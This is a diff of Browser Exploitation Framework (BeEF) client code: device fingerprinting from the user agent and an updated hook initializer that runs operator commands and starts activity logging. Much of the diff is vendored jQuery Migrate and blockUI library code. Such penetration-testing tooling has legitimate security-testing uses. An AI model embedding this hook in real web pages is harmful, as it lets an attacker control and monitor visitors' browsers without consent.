  },
  /*
   * @return: {Boolean} true or false.
   **/
  isGoogle: function() {
    return (this.ua.match('Nexus One')) ? true : false;
  },
  /**
   * Returns true if the browser is on a Mobile device
   * @return: {Boolean} true or false
   *
   * @example: if(beef.hardware.isMobileDevice()) { ... }
   **/
  isMobileDevice: function() {
    return MobileEsp.DetectMobileQuick();
  },
  /**
   * Returns true if the browser is on a game console
   * @return: {Boolean} true or false
   *
   * @example: if(beef.hardware.isGameConsole()) { ... }
   **/
  isGameConsole: function() {
    return MobileEsp.DetectGameConsole();
  },
  getName: function() {
    var ua = navigator.userAgent.toLowerCase();
    if(MobileEsp.DetectIphone())              { return "iPhone"};
    if(MobileEsp.DetectIpod())                { return "iPod Touch"};
    if(MobileEsp.DetectIpad())                { return "iPad"};
    if (this.isHtc())               { return 'HTC'};
    if (this.isMotorola())          { return 'Motorola'};
    if (this.isZune())              { return 'Zune'};
    if (this.isGoogle())            { return 'Google Nexus One'};
    if (this.isEricsson())          { return 'Ericsson'};
    if(MobileEsp.DetectAndroidPhone())        { return "Android Phone"};
    if(MobileEsp.DetectAndroidTablet())       { return "Android Tablet"};
    if(MobileEsp.DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
    if(ua.search(MobileEsp.deviceS60) > -1)   { return "Nokia S60"};
    if(ua.search(MobileEsp.deviceS70) > -1)   { return "Nokia S70"};
    if(ua.search(MobileEsp.deviceS80) > -1)   { return "Nokia S80"};
    if(ua.search(MobileEsp.deviceS90) > -1)   { return "Nokia S90"};
    if(ua.search(MobileEsp.deviceSymbian) > -1)   { return "Nokia Symbian"};
    if (this.isNokia())             { return 'Nokia'};
    if(MobileEsp.DetectWindowsPhone7())       { return "Windows Phone 7"};
    if(MobileEsp.DetectWindowsPhone8())       { return "Windows Phone 8"};
    if(MobileEsp.DetectWindowsPhone10())      { return "Windows Phone 10"};
    if(MobileEsp.DetectWindowsMobile())       { return "Windows Mobile"};
    if(MobileEsp.DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
    if(MobileEsp.DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
    if(MobileEsp.DetectBlackBerryTouch())     { return "BlackBerry Touch"};
    if(MobileEsp.DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
    if(MobileEsp.DetectBlackBerry())          { return "BlackBerry"};
    if(MobileEsp.DetectPalmOS())              { return "Palm OS"};
    if(MobileEsp.DetectPalmWebOS())           { return "Palm Web OS"};
    if(MobileEsp.DetectGarminNuvifone())      { return "Gamin Nuvifone"};
    if(MobileEsp.DetectArchos())              { return "Archos"}
    if(MobileEsp.DetectBrewDevice())          { return "Brew"};
    if(MobileEsp.DetectDangerHiptop())        { return "Danger Hiptop"};
    if(MobileEsp.DetectMaemoTablet())         { return "Maemo Tablet"};
    if(MobileEsp.DetectSonyMylo())            { return "Sony Mylo"};
    if(MobileEsp.DetectAmazonSilk())          { return "Kindle Fire"};
    if(MobileEsp.DetectKindle())              { return "Kindle"};
    if(MobileEsp.DetectSonyPlaystation())                 { return "Playstation"};
    if(ua.search(MobileEsp.deviceNintendoDs) > -1)        { return "Nintendo DS"};
    if(ua.search(MobileEsp.deviceWii) > -1)               { return "Nintendo Wii"};
    if(ua.search(MobileEsp.deviceNintendo) > -1)          { return "Nintendo"};
    if(MobileEsp.DetectXbox())                            { return "Xbox"};
    if(this.isLaptop())                         { return "Laptop"};
    if(this.isVirtualMachine())                 { return "Virtual Machine"};
    return 'Unknown';
  }
 };
 beef.regCmp('beef.hardware');
--- a/core/main/client/init.js
+++ b/core/main/client/init.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -64,18 +64,19 @@ window.onclose = function (event) {
 function beef_init() {
    if (!beef.pageIsLoaded) {
        beef.pageIsLoaded = true;
        beef.net.browser_details();
        if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
-            beef.websocket.start();
+            setTimeout(function(){
-            beef.net.browser_details();
+                beef.websocket.start();
-            beef.updater.execute_commands();
+                beef.updater.execute_commands();
-            beef.logger.start();
+                beef.logger.start();
-            beef.are.init();
+            }, parseInt(beef.websocket.ws_connect_timeout));
        }else {
            beef.net.browser_details();
            beef.updater.execute_commands();
            beef.updater.check();
            beef.logger.start();
            beef.are.init();
        }
    }
 }
--- a/core/main/client/lib/deployJava.js
+++ b/core/main/client/lib/deployJava.js
@@ -70,16 +70,10 @@ var deployJava = function() {
        hattrs.events);
    var applet_valid_attrs = hattrs.applet.concat(hattrs.core);
-    // generic log function, use console.log unless it isn't available
+    // generic log function
    // then revert to alert()
    function log(message) {
        if ( ! rv.debug ) {return};
-
+        beef.debug(message);
        if (console.log) {
            console.log(message);
        } else {
            alert(message);
        }
    }
    //checks where given version string matches query
@@ -1298,4 +1292,4 @@ var deployJava = function() {
    }
    return rv;
-}();
+}();
--- a/core/main/client/lib/evercookie.js
+++ b/core/main/client/lib/evercookie.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/lib/jquery-1.10.2.min.js
+++ b/core/main/client/lib/jquery-1.10.2.min.js
--- a/core/main/client/lib/jquery-1.12.4.min.js
+++ b/core/main/client/lib/jquery-1.12.4.min.js
--- a/core/main/client/lib/jquery-migrate-1.2.1.min.js
+++ b/core/main/client/lib/jquery-migrate-1.2.1.min.js
--- a/core/main/client/lib/jquery-migrate-1.4.1.js
+++ b/core/main/client/lib/jquery-migrate-1.4.1.js
@@ -0,0 +1,752 @@
 /*!
 * jQuery Migrate - v1.4.1 - 2016-05-19
 * Copyright jQuery Foundation and other contributors
 */
 (function( jQuery, window, undefined ) {
 // See http://bugs.jquery.com/ticket/13335
 // "use strict";
 jQuery.migrateVersion = "1.4.1";
 var warnedAbout = {};
 // List of warnings already given; public read only
 jQuery.migrateWarnings = [];
 // Set to true to prevent console output; migrateWarnings still maintained
 // jQuery.migrateMute = false;
 // Show a message on the console so devs know we're active
 if ( window.console && window.console.log ) {
 	window.console.log( "JQMIGRATE: Migrate is installed" +
 		( jQuery.migrateMute ? "" : " with logging active" ) +
 		", version " + jQuery.migrateVersion );
 }
 // Set to false to disable traces that appear with warnings
 if ( jQuery.migrateTrace === undefined ) {
 	jQuery.migrateTrace = true;
 }
 // Forget any warnings we've already given; public
 jQuery.migrateReset = function() {
 	warnedAbout = {};
 	jQuery.migrateWarnings.length = 0;
 };
 function migrateWarn( msg) {
 	var console = window.console;
 	if ( !warnedAbout[ msg ] ) {
 		warnedAbout[ msg ] = true;
 		jQuery.migrateWarnings.push( msg );
 		if ( console && console.warn && !jQuery.migrateMute ) {
 			console.warn( "JQMIGRATE: " + msg );
 			if ( jQuery.migrateTrace && console.trace ) {
 				console.trace();
 			}
 		}
 	}
 }
 function migrateWarnProp( obj, prop, value, msg ) {
 	if ( Object.defineProperty ) {
 		// On ES5 browsers (non-oldIE), warn if the code tries to get prop;
 		// allow property to be overwritten in case some other plugin wants it
 		try {
 			Object.defineProperty( obj, prop, {
 				configurable: true,
 				enumerable: true,
 				get: function() {
 					migrateWarn( msg );
 					return value;
 				},
 				set: function( newValue ) {
 					migrateWarn( msg );
 					value = newValue;
 				}
 			});
 			return;
 		} catch( err ) {
 			// IE8 is a dope about Object.defineProperty, can't warn there
 		}
 	}
 	// Non-ES5 (or broken) browser; just set the property
 	jQuery._definePropertyBroken = true;
 	obj[ prop ] = value;
 }
 if ( document.compatMode === "BackCompat" ) {
 	// jQuery has never supported or tested Quirks Mode
 	migrateWarn( "jQuery is not compatible with Quirks Mode" );
 }
 var attrFn = jQuery( "<input/>", { size: 1 } ).attr("size") && jQuery.attrFn,
 	oldAttr = jQuery.attr,
 	valueAttrGet = jQuery.attrHooks.value && jQuery.attrHooks.value.get ||
 		function() { return null; },
 	valueAttrSet = jQuery.attrHooks.value && jQuery.attrHooks.value.set ||
 		function() { return undefined; },
 	rnoType = /^(?:input|button)$/i,
 	rnoAttrNodeType = /^[238]$/,
 	rboolean = /^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,
 	ruseDefault = /^(?:checked|selected)$/i;
 // jQuery.attrFn
 migrateWarnProp( jQuery, "attrFn", attrFn || {}, "jQuery.attrFn is deprecated" );
 jQuery.attr = function( elem, name, value, pass ) {
 	var lowerName = name.toLowerCase(),
 		nType = elem && elem.nodeType;
 	if ( pass ) {
 		// Since pass is used internally, we only warn for new jQuery
 		// versions where there isn't a pass arg in the formal params
 		if ( oldAttr.length < 4 ) {
 			migrateWarn("jQuery.fn.attr( props, pass ) is deprecated");
 		}
 		if ( elem && !rnoAttrNodeType.test( nType ) &&
 			(attrFn ? name in attrFn : jQuery.isFunction(jQuery.fn[name])) ) {
 			return jQuery( elem )[ name ]( value );
 		}
 	}
 	// Warn if user tries to set `type`, since it breaks on IE 6/7/8; by checking
 	// for disconnected elements we don't warn on $( "<button>", { type: "button" } ).
 	if ( name === "type" && value !== undefined && rnoType.test( elem.nodeName ) && elem.parentNode ) {
 		migrateWarn("Can't change the 'type' of an input or button in IE 6/7/8");
 	}
 	// Restore boolHook for boolean property/attribute synchronization
 	if ( !jQuery.attrHooks[ lowerName ] && rboolean.test( lowerName ) ) {
 		jQuery.attrHooks[ lowerName ] = {
 			get: function( elem, name ) {
 				// Align boolean attributes with corresponding properties
 				// Fall back to attribute presence where some booleans are not supported
 				var attrNode,
 					property = jQuery.prop( elem, name );
 				return property === true || typeof property !== "boolean" &&
 					( attrNode = elem.getAttributeNode(name) ) && attrNode.nodeValue !== false ?
 					name.toLowerCase() :
 					undefined;
 			},
 			set: function( elem, value, name ) {
 				var propName;
 				if ( value === false ) {
 					// Remove boolean attributes when set to false
 					jQuery.removeAttr( elem, name );
 				} else {
 					// value is true since we know at this point it's type boolean and not false
 					// Set boolean attributes to the same name and set the DOM property
 					propName = jQuery.propFix[ name ] || name;
 					if ( propName in elem ) {
 						// Only set the IDL specifically if it already exists on the element
 						elem[ propName ] = true;
 					}
 					elem.setAttribute( name, name.toLowerCase() );
 				}
 				return name;
 			}
 		};
 		// Warn only for attributes that can remain distinct from their properties post-1.9
 		if ( ruseDefault.test( lowerName ) ) {
 			migrateWarn( "jQuery.fn.attr('" + lowerName + "') might use property instead of attribute" );
 		}
 	}
 	return oldAttr.call( jQuery, elem, name, value );
 };
 // attrHooks: value
 jQuery.attrHooks.value = {
 	get: function( elem, name ) {
 		var nodeName = ( elem.nodeName || "" ).toLowerCase();
 		if ( nodeName === "button" ) {
 			return valueAttrGet.apply( this, arguments );
 		}
 		if ( nodeName !== "input" && nodeName !== "option" ) {
 			migrateWarn("jQuery.fn.attr('value') no longer gets properties");
 		}
 		return name in elem ?
 			elem.value :
 			null;
 	},
 	set: function( elem, value ) {
 		var nodeName = ( elem.nodeName || "" ).toLowerCase();
 		if ( nodeName === "button" ) {
 			return valueAttrSet.apply( this, arguments );
 		}
 		if ( nodeName !== "input" && nodeName !== "option" ) {
 			migrateWarn("jQuery.fn.attr('value', val) no longer sets properties");
 		}
 		// Does not return so that setAttribute is also used
 		elem.value = value;
 	}
 };
 var matched, browser,
 	oldInit = jQuery.fn.init,
 	oldFind = jQuery.find,
 	oldParseJSON = jQuery.parseJSON,
 	rspaceAngle = /^\s*</,
 	rattrHashTest = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/,
 	rattrHashGlob = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/g,
 	// Note: XSS check is done below after string is trimmed
 	rquickExpr = /^([^<]*)(<[\w\W]+>)([^>]*)$/;
 // $(html) "looks like html" rule change
 jQuery.fn.init = function( selector, context, rootjQuery ) {
 	var match, ret;
 	if ( selector && typeof selector === "string" ) {
 		if ( !jQuery.isPlainObject( context ) &&
 				(match = rquickExpr.exec( jQuery.trim( selector ) )) && match[ 0 ] ) {
 			// This is an HTML string according to the "old" rules; is it still?
 			if ( !rspaceAngle.test( selector ) ) {
 				migrateWarn("$(html) HTML strings must start with '<' character");
 			}
 			if ( match[ 3 ] ) {
 				migrateWarn("$(html) HTML text after last tag is ignored");
 			}
 			// Consistently reject any HTML-like string starting with a hash (gh-9521)
 			// Note that this may break jQuery 1.6.x code that otherwise would work.
 			if ( match[ 0 ].charAt( 0 ) === "#" ) {
 				migrateWarn("HTML string cannot start with a '#' character");
 				jQuery.error("JQMIGRATE: Invalid selector string (XSS)");
 			}
 			// Now process using loose rules; let pre-1.8 play too
 			// Is this a jQuery context? parseHTML expects a DOM element (#178)
 			if ( context && context.context && context.context.nodeType ) {
 				context = context.context;
 			}
 			if ( jQuery.parseHTML ) {
 				return oldInit.call( this,
 						jQuery.parseHTML( match[ 2 ], context && context.ownerDocument ||
 							context || document, true ), context, rootjQuery );
 			}
 		}
 	}
 	ret = oldInit.apply( this, arguments );
 	// Fill in selector and context properties so .live() works
 	if ( selector && selector.selector !== undefined ) {
 		// A jQuery object, copy its properties
 		ret.selector = selector.selector;
 		ret.context = selector.context;
 	} else {
 		ret.selector = typeof selector === "string" ? selector : "";
 		if ( selector ) {
 			ret.context = selector.nodeType? selector : context || document;
 		}
 	}
 	return ret;
 };
 jQuery.fn.init.prototype = jQuery.fn;
 jQuery.find = function( selector ) {
 	var args = Array.prototype.slice.call( arguments );
 	// Support: PhantomJS 1.x
 	// String#match fails to match when used with a //g RegExp, only on some strings
 	if ( typeof selector === "string" && rattrHashTest.test( selector ) ) {
 		// The nonstandard and undocumented unquoted-hash was removed in jQuery 1.12.0
 		// First see if qS thinks it's a valid selector, if so avoid a false positive
 		try {
 			document.querySelector( selector );
 		} catch ( err1 ) {
 			// Didn't *look* valid to qSA, warn and try quoting what we think is the value
 			selector = selector.replace( rattrHashGlob, function( _, attr, op, value ) {
 				return "[" + attr + op + "\"" + value + "\"]";
 			} );
 			// If the regexp *may* have created an invalid selector, don't update it
 			// Note that there may be false alarms if selector uses jQuery extensions
 			try {
 				document.querySelector( selector );
 				migrateWarn( "Attribute selector with '#' must be quoted: " + args[ 0 ] );
 				args[ 0 ] = selector;
 			} catch ( err2 ) {
 				migrateWarn( "Attribute selector with '#' was not fixed: " + args[ 0 ] );
 			}
 		}
 	}
 	return oldFind.apply( this, args );
 };
 // Copy properties attached to original jQuery.find method (e.g. .attr, .isXML)
 var findProp;
 for ( findProp in oldFind ) {
 	if ( Object.prototype.hasOwnProperty.call( oldFind, findProp ) ) {
 		jQuery.find[ findProp ] = oldFind[ findProp ];
 	}
 }
 // Let $.parseJSON(falsy_value) return null
 jQuery.parseJSON = function( json ) {
 	if ( !json ) {
 		migrateWarn("jQuery.parseJSON requires a valid JSON string");
 		return null;
 	}
 	return oldParseJSON.apply( this, arguments );
 };
 jQuery.uaMatch = function( ua ) {
 	ua = ua.toLowerCase();
 	var match = /(chrome)[ \/]([\w.]+)/.exec( ua ) ||
 		/(webkit)[ \/]([\w.]+)/.exec( ua ) ||
 		/(opera)(?:.*version|)[ \/]([\w.]+)/.exec( ua ) ||
 		/(msie) ([\w.]+)/.exec( ua ) ||
 		ua.indexOf("compatible") < 0 && /(mozilla)(?:.*? rv:([\w.]+)|)/.exec( ua ) ||
 		[];
 	return {
 		browser: match[ 1 ] || "",
 		version: match[ 2 ] || "0"
 	};
 };
 // Don't clobber any existing jQuery.browser in case it's different
 if ( !jQuery.browser ) {
 	matched = jQuery.uaMatch( navigator.userAgent );
 	browser = {};
 	if ( matched.browser ) {
 		browser[ matched.browser ] = true;
 		browser.version = matched.version;
 	}
 	// Chrome is Webkit, but Webkit is also Safari.
 	if ( browser.chrome ) {
 		browser.webkit = true;
 	} else if ( browser.webkit ) {
 		browser.safari = true;
 	}
 	jQuery.browser = browser;
 }
 // Warn if the code tries to get jQuery.browser
 migrateWarnProp( jQuery, "browser", jQuery.browser, "jQuery.browser is deprecated" );
 // jQuery.boxModel deprecated in 1.3, jQuery.support.boxModel deprecated in 1.7
 jQuery.boxModel = jQuery.support.boxModel = (document.compatMode === "CSS1Compat");
 migrateWarnProp( jQuery, "boxModel", jQuery.boxModel, "jQuery.boxModel is deprecated" );
 migrateWarnProp( jQuery.support, "boxModel", jQuery.support.boxModel, "jQuery.support.boxModel is deprecated" );
 jQuery.sub = function() {
 	function jQuerySub( selector, context ) {
 		return new jQuerySub.fn.init( selector, context );
 	}
 	jQuery.extend( true, jQuerySub, this );
 	jQuerySub.superclass = this;
 	jQuerySub.fn = jQuerySub.prototype = this();
 	jQuerySub.fn.constructor = jQuerySub;
 	jQuerySub.sub = this.sub;
 	jQuerySub.fn.init = function init( selector, context ) {
 		var instance = jQuery.fn.init.call( this, selector, context, rootjQuerySub );
 		return instance instanceof jQuerySub ?
 			instance :
 			jQuerySub( instance );
 	};
 	jQuerySub.fn.init.prototype = jQuerySub.fn;
 	var rootjQuerySub = jQuerySub(document);
 	migrateWarn( "jQuery.sub() is deprecated" );
 	return jQuerySub;
 };
 // The number of elements contained in the matched element set
 jQuery.fn.size = function() {
 	migrateWarn( "jQuery.fn.size() is deprecated; use the .length property" );
 	return this.length;
 };
 var internalSwapCall = false;
 // If this version of jQuery has .swap(), don't false-alarm on internal uses
 if ( jQuery.swap ) {
 	jQuery.each( [ "height", "width", "reliableMarginRight" ], function( _, name ) {
 		var oldHook = jQuery.cssHooks[ name ] && jQuery.cssHooks[ name ].get;
 		if ( oldHook ) {
 			jQuery.cssHooks[ name ].get = function() {
 				var ret;
 				internalSwapCall = true;
 				ret = oldHook.apply( this, arguments );
 				internalSwapCall = false;
 				return ret;
 			};
 		}
 	});
 }
 jQuery.swap = function( elem, options, callback, args ) {
 	var ret, name,
 		old = {};
 	if ( !internalSwapCall ) {
 		migrateWarn( "jQuery.swap() is undocumented and deprecated" );
 	}
 	// Remember the old values, and insert the new ones
 	for ( name in options ) {
 		old[ name ] = elem.style[ name ];
 		elem.style[ name ] = options[ name ];
 	}
 	ret = callback.apply( elem, args || [] );
 	// Revert the old values
 	for ( name in options ) {
 		elem.style[ name ] = old[ name ];
 	}
 	return ret;
 };
 // Ensure that $.ajax gets the new parseJSON defined in core.js
 jQuery.ajaxSetup({
 	converters: {
 		"text json": jQuery.parseJSON
 	}
 });
 var oldFnData = jQuery.fn.data;
 jQuery.fn.data = function( name ) {
 	var ret, evt,
 		elem = this[0];
 	// Handles 1.7 which has this behavior and 1.8 which doesn't
 	if ( elem && name === "events" && arguments.length === 1 ) {
 		ret = jQuery.data( elem, name );
 		evt = jQuery._data( elem, name );
 		if ( ( ret === undefined || ret === evt ) && evt !== undefined ) {
 			migrateWarn("Use of jQuery.fn.data('events') is deprecated");
 			return evt;
 		}
 	}
 	return oldFnData.apply( this, arguments );
 };
 var rscriptType = /\/(java|ecma)script/i;
 // Since jQuery.clean is used internally on older versions, we only shim if it's missing
 if ( !jQuery.clean ) {
 	jQuery.clean = function( elems, context, fragment, scripts ) {
 		// Set context per 1.8 logic
 		context = context || document;
 		context = !context.nodeType && context[0] || context;
 		context = context.ownerDocument || context;
 		migrateWarn("jQuery.clean() is deprecated");
 		var i, elem, handleScript, jsTags,
 			ret = [];
 		jQuery.merge( ret, jQuery.buildFragment( elems, context ).childNodes );
 		// Complex logic lifted directly from jQuery 1.8
 		if ( fragment ) {
 			// Special handling of each script element
 			handleScript = function( elem ) {
 				// Check if we consider it executable
 				if ( !elem.type || rscriptType.test( elem.type ) ) {
 					// Detach the script and store it in the scripts array (if provided) or the fragment
 					// Return truthy to indicate that it has been handled
 					return scripts ?
 						scripts.push( elem.parentNode ? elem.parentNode.removeChild( elem ) : elem ) :
 						fragment.appendChild( elem );
 				}
 			};
 			for ( i = 0; (elem = ret[i]) != null; i++ ) {
 				// Check if we're done after handling an executable script
 				if ( !( jQuery.nodeName( elem, "script" ) && handleScript( elem ) ) ) {
 					// Append to fragment and handle embedded scripts
 					fragment.appendChild( elem );
 					if ( typeof elem.getElementsByTagName !== "undefined" ) {
 						// handleScript alters the DOM, so use jQuery.merge to ensure snapshot iteration
 						jsTags = jQuery.grep( jQuery.merge( [], elem.getElementsByTagName("script") ), handleScript );
 						// Splice the scripts into ret after their former ancestor and advance our index beyond them
 						ret.splice.apply( ret, [i + 1, 0].concat( jsTags ) );
 						i += jsTags.length;
 					}
 				}
 			}
 		}
 		return ret;
 	};
 }
 var eventAdd = jQuery.event.add,
 	eventRemove = jQuery.event.remove,
 	eventTrigger = jQuery.event.trigger,
 	oldToggle = jQuery.fn.toggle,
 	oldLive = jQuery.fn.live,
 	oldDie = jQuery.fn.die,
 	oldLoad = jQuery.fn.load,
 	ajaxEvents = "ajaxStart|ajaxStop|ajaxSend|ajaxComplete|ajaxError|ajaxSuccess",
 	rajaxEvent = new RegExp( "\\b(?:" + ajaxEvents + ")\\b" ),
 	rhoverHack = /(?:^|\s)hover(\.\S+|)\b/,
 	hoverHack = function( events ) {
 		if ( typeof( events ) !== "string" || jQuery.event.special.hover ) {
 			return events;
 		}
 		if ( rhoverHack.test( events ) ) {
 			migrateWarn("'hover' pseudo-event is deprecated, use 'mouseenter mouseleave'");
 		}
 		return events && events.replace( rhoverHack, "mouseenter$1 mouseleave$1" );
 	};
 // Event props removed in 1.9, put them back if needed; no practical way to warn them
 if ( jQuery.event.props && jQuery.event.props[ 0 ] !== "attrChange" ) {
 	jQuery.event.props.unshift( "attrChange", "attrName", "relatedNode", "srcElement" );
 }
 // Undocumented jQuery.event.handle was "deprecated" in jQuery 1.7
 if ( jQuery.event.dispatch ) {
 	migrateWarnProp( jQuery.event, "handle", jQuery.event.dispatch, "jQuery.event.handle is undocumented and deprecated" );
 }
 // Support for 'hover' pseudo-event and ajax event warnings
 jQuery.event.add = function( elem, types, handler, data, selector ){
 	if ( elem !== document && rajaxEvent.test( types ) ) {
 		migrateWarn( "AJAX events should be attached to document: " + types );
 	}
 	eventAdd.call( this, elem, hoverHack( types || "" ), handler, data, selector );
 };
 jQuery.event.remove = function( elem, types, handler, selector, mappedTypes ){
 	eventRemove.call( this, elem, hoverHack( types ) || "", handler, selector, mappedTypes );
 };
 jQuery.each( [ "load", "unload", "error" ], function( _, name ) {
 	jQuery.fn[ name ] = function() {
 		var args = Array.prototype.slice.call( arguments, 0 );
 		// If this is an ajax load() the first arg should be the string URL;
 		// technically this could also be the "Anything" arg of the event .load()
 		// which just goes to show why this dumb signature has been deprecated!
 		// jQuery custom builds that exclude the Ajax module justifiably die here.
 		if ( name === "load" && typeof args[ 0 ] === "string" ) {
 			return oldLoad.apply( this, args );
 		}
 		migrateWarn( "jQuery.fn." + name + "() is deprecated" );
 		args.splice( 0, 0, name );
 		if ( arguments.length ) {
 			return this.bind.apply( this, args );
 		}
 		// Use .triggerHandler here because:
 		// - load and unload events don't need to bubble, only applied to window or image
 		// - error event should not bubble to window, although it does pre-1.7
 		// See http://bugs.jquery.com/ticket/11820
 		this.triggerHandler.apply( this, args );
 		return this;
 	};
 });
 jQuery.fn.toggle = function( fn, fn2 ) {
 	// Don't mess with animation or css toggles
 	if ( !jQuery.isFunction( fn ) || !jQuery.isFunction( fn2 ) ) {
 		return oldToggle.apply( this, arguments );
 	}
 	migrateWarn("jQuery.fn.toggle(handler, handler...) is deprecated");
 	// Save reference to arguments for access in closure
 	var args = arguments,
 		guid = fn.guid || jQuery.guid++,
 		i = 0,
 		toggler = function( event ) {
 			// Figure out which function to execute
 			var lastToggle = ( jQuery._data( this, "lastToggle" + fn.guid ) || 0 ) % i;
 			jQuery._data( this, "lastToggle" + fn.guid, lastToggle + 1 );
 			// Make sure that clicks stop
 			event.preventDefault();
 			// and execute the function
 			return args[ lastToggle ].apply( this, arguments ) || false;
 		};
 	// link all the functions, so any of them can unbind this click handler
 	toggler.guid = guid;
 	while ( i < args.length ) {
 		args[ i++ ].guid = guid;
 	}
 	return this.click( toggler );
 };
 jQuery.fn.live = function( types, data, fn ) {
 	migrateWarn("jQuery.fn.live() is deprecated");
 	if ( oldLive ) {
 		return oldLive.apply( this, arguments );
 	}
 	jQuery( this.context ).on( types, this.selector, data, fn );
 	return this;
 };
 jQuery.fn.die = function( types, fn ) {
 	migrateWarn("jQuery.fn.die() is deprecated");
 	if ( oldDie ) {
 		return oldDie.apply( this, arguments );
 	}
 	jQuery( this.context ).off( types, this.selector || "**", fn );
 	return this;
 };
 // Turn global events into document-triggered events
 jQuery.event.trigger = function( event, data, elem, onlyHandlers  ){
 	if ( !elem && !rajaxEvent.test( event ) ) {
 		migrateWarn( "Global events are undocumented and deprecated" );
 	}
 	return eventTrigger.call( this,  event, data, elem || document, onlyHandlers  );
 };
 jQuery.each( ajaxEvents.split("|"),
 	function( _, name ) {
 		jQuery.event.special[ name ] = {
 			setup: function() {
 				var elem = this;
 				// The document needs no shimming; must be !== for oldIE
 				if ( elem !== document ) {
 					jQuery.event.add( document, name + "." + jQuery.guid, function() {
 						jQuery.event.trigger( name, Array.prototype.slice.call( arguments, 1 ), elem, true );
 					});
 					jQuery._data( this, name, jQuery.guid++ );
 				}
 				return false;
 			},
 			teardown: function() {
 				if ( this !== document ) {
 					jQuery.event.remove( document, name + "." + jQuery._data( this, name ) );
 				}
 				return false;
 			}
 		};
 	}
 );
 jQuery.event.special.ready = {
 	setup: function() {
 		if ( this === document ) {
 			migrateWarn( "'ready' event is deprecated" );
 		}
 	}
 };
 var oldSelf = jQuery.fn.andSelf || jQuery.fn.addBack,
 	oldFnFind = jQuery.fn.find;
 jQuery.fn.andSelf = function() {
 	migrateWarn("jQuery.fn.andSelf() replaced by jQuery.fn.addBack()");
 	return oldSelf.apply( this, arguments );
 };
 jQuery.fn.find = function( selector ) {
 	var ret = oldFnFind.apply( this, arguments );
 	ret.context = this.context;
 	ret.selector = this.selector ? this.selector + " " + selector : selector;
 	return ret;
 };
 // jQuery 1.6 did not support Callbacks, do not warn there
 if ( jQuery.Callbacks ) {
 	var oldDeferred = jQuery.Deferred,
 		tuples = [
 			// action, add listener, callbacks, .then handlers, final state
 			[ "resolve", "done", jQuery.Callbacks("once memory"),
 				jQuery.Callbacks("once memory"), "resolved" ],
 			[ "reject", "fail", jQuery.Callbacks("once memory"),
 				jQuery.Callbacks("once memory"), "rejected" ],
 			[ "notify", "progress", jQuery.Callbacks("memory"),
 				jQuery.Callbacks("memory") ]
 		];
 	jQuery.Deferred = function( func ) {
 		var deferred = oldDeferred(),
 			promise = deferred.promise();
 		deferred.pipe = promise.pipe = function( /* fnDone, fnFail, fnProgress */ ) {
 			var fns = arguments;
 			migrateWarn( "deferred.pipe() is deprecated" );
 			return jQuery.Deferred(function( newDefer ) {
 				jQuery.each( tuples, function( i, tuple ) {
 					var fn = jQuery.isFunction( fns[ i ] ) && fns[ i ];
 					// deferred.done(function() { bind to newDefer or newDefer.resolve })
 					// deferred.fail(function() { bind to newDefer or newDefer.reject })
 					// deferred.progress(function() { bind to newDefer or newDefer.notify })
 					deferred[ tuple[1] ](function() {
 						var returned = fn && fn.apply( this, arguments );
 						if ( returned && jQuery.isFunction( returned.promise ) ) {
 							returned.promise()
 								.done( newDefer.resolve )
 								.fail( newDefer.reject )
 								.progress( newDefer.notify );
 						} else {
 							newDefer[ tuple[ 0 ] + "With" ](
 								this === promise ? newDefer.promise() : this,
 								fn ? [ returned ] : arguments
 							);
 						}
 					});
 				});
 				fns = null;
 			}).promise();
 		};
 		deferred.isResolved = function() {
 			migrateWarn( "deferred.isResolved is deprecated" );
 			return deferred.state() === "resolved";
 		};
 		deferred.isRejected = function() {
 			migrateWarn( "deferred.isRejected is deprecated" );
 			return deferred.state() === "rejected";
 		};
 		if ( func ) {
 			func.call( deferred, deferred );
 		}
 		return deferred;
 	};
 }
 })( jQuery, window );
--- a/core/main/client/lib/jquery.blockUI.js
+++ b/core/main/client/lib/jquery.blockUI.js
@@ -0,0 +1,620 @@
 /*!
 * jQuery blockUI plugin
 * Version 2.70.0-2014.11.23
 * Requires jQuery v1.7 or later
 *
 * Examples at: http://malsup.com/jquery/block/
 * Copyright (c) 2007-2013 M. Alsup
 * Dual licensed under the MIT and GPL licenses:
 * http://www.opensource.org/licenses/mit-license.php
 * http://www.gnu.org/licenses/gpl.html
 *
 * Thanks to Amir-Hossein Sobhi for some excellent contributions!
 */
 ;(function() {
 /*jshint eqeqeq:false curly:false latedef:false */
 "use strict";
 	function setup($) {
 		$.fn._fadeIn = $.fn.fadeIn;
 		var noOp = $.noop || function() {};
 		// this bit is to ensure we don't call setExpression when we shouldn't (with extra muscle to handle
 		// confusing userAgent strings on Vista)
 		var msie = /MSIE/.test(navigator.userAgent);
 		var ie6  = /MSIE 6.0/.test(navigator.userAgent) && ! /MSIE 8.0/.test(navigator.userAgent);
 		var mode = document.documentMode || 0;
 		var setExpr = $.isFunction( document.createElement('div').style.setExpression );
 		// global $ methods for blocking/unblocking the entire page
 		$.blockUI   = function(opts) { install(window, opts); };
 		$.unblockUI = function(opts) { remove(window, opts); };
 		// convenience method for quick growl-like notifications  (http://www.google.com/search?q=growl)
 		$.growlUI = function(title, message, timeout, onClose) {
 			var $m = $('<div class="growlUI"></div>');
 			if (title) $m.append('<h1>'+title+'</h1>');
 			if (message) $m.append('<h2>'+message+'</h2>');
 			if (timeout === undefined) timeout = 3000;
 			// Added by konapun: Set timeout to 30 seconds if this growl is moused over, like normal toast notifications
 			var callBlock = function(opts) {
 				opts = opts || {};
 				$.blockUI({
